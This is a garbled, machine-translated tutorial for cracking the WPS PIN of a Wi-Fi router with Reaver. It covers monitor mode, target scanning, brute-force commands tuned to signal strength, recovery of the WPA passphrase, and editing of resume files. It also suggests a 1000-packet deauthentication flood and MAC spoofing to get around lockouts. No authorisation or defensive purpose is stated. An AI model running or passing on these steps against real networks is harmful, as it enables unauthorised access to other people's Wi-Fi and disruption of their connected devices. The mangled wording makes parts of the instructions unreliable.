Reaver run Router PIN code process: (under root privileges)
1 input: Airmon-ng start wlan0 turn on monitor mode
2 Input: wash-i mon0-c View all open wps No line by long time no response press CTRL + C, end the process, then write down the destination you want PJ to route the Mac.
3 Input: Airodump-ng mon0 card scans all channels in promiscuous mode-and displays information about all APS (including AP signal strength, ESSID,MAC, channel, encryption, etc...), press CTRL + C to end the scan.
4 Input: Reaver-i mon0-b mac-a-s-vv start poor lifting pin code
Reaver parameter Details:
-i,–interface=<wlan> Name of the Monitor-mode interface to use
The monitor interface of the NIC, usually mon0 (required)
-b,–bssid=<mac> Bssid of the target AP
MAC address of the AP (required)
-c,–channel=<channel> Set The 802.11 channel for the interface (IMPLIES-F)
Signal the channel, if not specified will be automatically scanned, such as-C1 designated 1 channel (common)
-a,–auto Auto Detect the best advanced options for the target AP
Automatic detection of advanced parameters for target APS, automatic detection of target AP optimal configuration (Common)
-v,–verbose Display non-critical warnings (-VV for more)
Show unimportant warning messages-VV can show more (common)
-s using minimal DH key to improve PJ speed (common)
-T is the maximum time that timeout waits for feedback per time (common)
-s,–session=<file> Restore A previous session file
Recovery Progress File
-n,–no-nacks do not send NACK messages if out of order packets is received
Do not send nack information
-n,–nack Target AP always sends a nack [Auto]
Always send Nack to target AP, default auto
-f,–fixed Disable Channel Hopping
No channel jumps
-p,–pin=<wps pin> Use the specified 4 or 8 digit WPS PIN
Using the specified 4-bit or 8-digit PIN, you can find the password directly using 8-bit (common)
-d,–delay=<seconds> Set The delay between pin attempts [1]
Delay between pins, default 1 seconds (Common)
-l,–lock-delay=<seconds> Set the time to wait if the AP locks WPS PIN attempts [60]
Wait time after AP locks WPS
-g,–max-attempts=<num> Quit after num PIN attempts
Maximum PIN count
-q,–quiet only display critical messages
Show only critical information
-h,–help Show Help
Show Help
Due to condition adjustment parameters (-C has a target channel of 1 as an example)
Target signal very good: reaver-i mon0-b mac-a-s-vv-d0-c 1
Target signal Normal: Reaver-i mon0-b mac-a-s-vv-d2-t. 5-c 1
Target signal General: Reaver-i Mon0-b mac-a-s-vv-d5-c 1
Handling of Frequently Asked questions:
1. If there is a long WPA PSK, you can use the Fourth command "Reaver–i mon0–b mac–p WPA PSK"
MAC is the target MAC address, and the WPA PSK is the super long password obtained. The function is to get the specified PIN code
WPA Password PSK.
2.reaver-i mon0-b mac-p PIN8 number of digits
Get the PSK password directly from the PIN code
3.90.9% process after a problem or stuck, please note the first four digits of the pin, re-run the last three digits, if the first four digits are correct
Reaver-i mon0-b mac-p pin Top 4 digits
4.PIN Zombie Locking method. You can also attack the MAC-C legitimate client's Mac Nic Port for the route aireplay-ng-0 1000-a SSID that hides the SSID
is to have the client disconnect 1000 times Macchanger
Pin's progress file is saved under/usr/local/etc/, XXXXXXXXXXXX.WPC (MAC address is file name)
MAC.WPC structure
0//First line, this place is saying it's the number of progress positions for the first 4 digits of the PIN
0//second line, this place is the number of test positions that have been run after the 3-digit PIN number
0//Third line, 0 o'clock not found, when 1 is found the first four bits, when for 2 o'clock all found.
1234
0123
1111
2222
3333
.......
.......
If we want to start the pin from 2000, you can change the first line to 2004 so it starts with a pin of 2000.
The command is reaver-i mon0-b xx:xx:xx:xx:xx-a-s-vv-s/usr/local/etc/xxxxxxxxxxxx.wpc, lowercase-s followed by the path of the progress file.
Reaver Run PIN code WPC file Modification